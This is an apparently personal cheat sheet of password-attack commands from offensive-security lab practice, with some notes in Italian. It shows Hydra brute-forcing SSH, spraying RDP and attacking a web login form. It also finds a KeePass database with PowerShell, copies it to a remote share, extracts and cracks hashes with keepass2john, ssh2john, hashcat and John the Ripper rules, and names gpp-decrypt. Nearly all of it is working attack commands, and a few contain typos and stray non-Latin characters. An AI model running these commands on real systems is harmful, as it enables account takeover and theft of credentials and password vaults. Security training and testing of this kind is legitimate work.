Password Attacks


# Password and Hashed attacks with common tools

SSH and RDP dictionary attacks with

Hydra

## SSH Bruteforce
kali@kali:/usr/share/wordlists$ sudo hydra -l george -P /usr/share/wordlists/rockyou.txt
s 2222 ssh://192.168.139.201
# -l username known
# -P passwords unknown

## Password Spraying against RDP
kali@kali:~$ sudo hydra -L /usr/share/wordlists/dirb/others/names.txt -р "SuperS3cure1337#"
rdp://192.168.139.202

POST Login Form dictionary attack

kali@kali:~$ sudo hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.122.201 
	http-post-form "/index.php: fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
#
#fields:
# 1 -> index.php, login page
# 2 -> body of POST request (^PASS^ is payload)
# 3 -> failed login identifier

Hashcat

# calculate hash rate
hashcat -b

Windows encrypted password manager Attack Path

# Locate File
Get-ChildItem -Path с:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

# copy to share
copy .\Documents \Database.kdbx \\192.168.122.139\share\Database.kdbx

# JohnTheRipper for keepass format
keepass2john database.kdbx > password.hash
# remove database: string because there's no username in keepass

# Find format
hashcat --help | grep -i "KeePass"

# crack hash
hashcat -m [numeroCrack] password.hash /usr/share/wordlists/rockyou.txt -r rulefile --force
# numeroCrack -> output help command
# rulefile -> /usr/share/hashcat/rules/rockyou-30000.rule

mutating wordlists (rule based attack)

kali@kali:~/passwordattackss echo \$1 > demo.rule
kali@kali:~/passwordattackss hashcat -r demo.rule --stdout demo.txt

# $1 nella rule aggiunge 1 alla fine di ogni password
# $ appende, ^ prepende

kali@kali:~/passwordattackss echo c >> demo.rule
# c rende la prima lettera di ogni password maiuscola

kali@kali:~/passwordattackss echo \$! >> demo.rule
# append an ! 

hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt -r demo.rule --force


how to crack an ssh private key passphrase

ssh2john id_rsa > ssh.hash
# remove filename before first column
# see $x$ to see correct hashcat mode

hashcath | grep -i "ssh"
# number in output

JohnTheRipper

To use rulefiles:

# add [List.Rules:sshRules] to beginning of rule file
# append rule file to /etc/john/john.conf

john --wordlist=ssh.passwords --rules=sshRules ssh.hash

Group Policy Passwords

gpp-decrypt